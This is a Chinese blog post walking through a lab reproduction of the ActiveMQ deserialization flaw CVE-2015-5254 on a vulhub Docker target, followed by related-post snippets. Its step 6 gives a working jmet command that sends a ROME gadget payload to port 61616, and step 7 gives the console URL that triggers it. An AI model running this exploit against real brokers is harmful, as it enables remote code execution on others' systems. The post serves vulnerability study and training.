ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现

于 2023-04-26 17:45:28 发布
阅读量536 收藏
点赞数
文章标签: activemq 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenming08/article/details/130391100
版权

当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)
实验环境:攻击机----kali
靶机:centos7
需要的jar包:jmet-0.1.0-all.jar
1、启动docker,进入vulhub(靶机)
在这里插入图片描述
2、进入CVE-2015-5254环境(靶机)
在这里插入图片描述
3、启动环境(靶机)
在这里插入图片描述
4、查看进程(靶机)
在这里插入图片描述
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)
在这里插入图片描述
6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)
在这里插入图片描述在这里插入图片描述
7、访问控制台:http://你的IP:8161/admin/browse.jsp?JMSDestination=event
触发
在这里插入图片描述
8、进入容器,docker exec -it cve-2015-5254_activemq_1 /bin/bash(靶机)
success 已成功创建,表明漏洞利用成功:
在这里插入图片描述

千其昂cm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2015-5254(ActiveMQ序列漏洞)
Sea_Sand息禅
07-13 2858
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者...
ActiveMQ 序列漏洞CVE-2015-5254)利用工具
08-15
在2015年,ActiveMQ被发存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个序列漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 序列漏洞通常发生在对象从...
ActiveMQ序列漏洞CVE-2015-5254
Cwillchris的博客
03-31 7747
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ 序列漏洞 (CVE-2015-5254) 漏洞
wswr的博客
03-04 1153
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-CSDN博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列的类。远程攻击者可以使一个特殊的序列 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
ActiveMQ 序列漏洞 (CVE-2015-5254)
qq_45314073的博客
09-16 1480
ActiveMQ 序列漏洞
ActiveMQ 序列漏洞(CVE-2015-5254)
baidu_38844729的博客
01-22 519
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
总之,ActiveMQ-CPP Library 3.9.5为C++开发者提供了与ActiveMQ交互的便捷方式,结合Visual Studio 2015和2017的支持,能够在Windows平台上高效地构建消息驱动的应用程序。通过理解其核心组件和使用方法,开发者可以...
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
java-1.0.1.jar
10-15
java-1.0.1.jar 压缩 包里面有对应的jar 架包,解压出来就可以
jsch-0.1.50.jar(Jmeter 操作 Linux 所必须的两Jar包之一)
03-22
jsch-0.1.50.jar(Jmeter 操作 Linux 所必须的两Jar包之一)
【jmeter】jmeter-plugins-manager-1.3.jar下载
10-23
【jmeter】jmeter插件管理插件:jmeter-plugins-manager-1.3.jar下载
jmeter jar包完整版
01-04
供集成开源jmeter使用的jar包集合,包含jmeter所有组件
myJmeter-0.0.1-SNAPSHOT.jar
12-05
Jmeter提供的函数只有整数求和,此插件提供小数的求和函数。插件放置位置为apache-jmeter-5.0\lib\ext目录下,放好之后重启jmeter即可使用函数__doubleSum(pram1,pram2)
ActiveMQ序列漏洞CVE-2015-5254)
qq_40708881的博客
12-10 302
ActiveMQ序列漏洞CVE-2015-5254) 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞环境 git
Apache ActiveMQ序列漏洞(CVE-2015-5254)
WY92139010的博客
08-06 417
Apache ActiveMQ序列漏洞(CVE-2015-5254) 一、漏洞描述 该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 二、漏洞影响版本 Apache ActiveMQ 5.13.0之前的版本 三、漏洞环境搭建 1、官网下载ActiveMQ 5.11....
ActiveMQ序列漏洞 getshell(CVE-2015-5254)——漏洞
W小哥
11-10 3694
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列的类,远程攻击者可以借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
CVE-2015-5254(ActiveMQ 序列漏洞
p_utao的博客
03-19 391
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
ActiveMQ 序列漏洞
最新发布
08-19
ActiveMQ 序列漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ序列序列机制造成的。 攻击者可以构造恶意序列对象,然后将其发送给 ActiveMQ 服务器。当服务器接收到恶意序列对象并进行序列时,恶意代码就会被执行,从而导致系统受到攻击。 为了防止 ActiveMQ 序列漏洞的利用,可以采取以下措施: 1. 更新和升级:及时更新 ActiveMQ 版本,以获取最新的安全修漏洞。 2. 配置安全策略:通过配置 ActiveMQ 的安全策略来限制用户对序列序列的访问权限,只允许信任的类进行序列操作。 3. 输入验证和过滤:在接收到消息之前,对用户提交的数据进行严格的输入验证和过滤,确保只接受合法和可信的数据。 4. 序列过滤:实施白名单机制,只允许特定的类进行序列操作,阻止未知类的序列。 5. 安全意识培训:加强对开发人员和系统管理员的安全意识培训,提高他们对序列漏洞的认识,以及如何正确地使用 ActiveMQ。 请注意,这些建议只是一些通用的防御措施,具体的安全配置和防护措施需要根据实际情况进行调整和实施。建议在使用 ActiveMQ 或其他中间件时,密切关注厂商的安全公告和最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值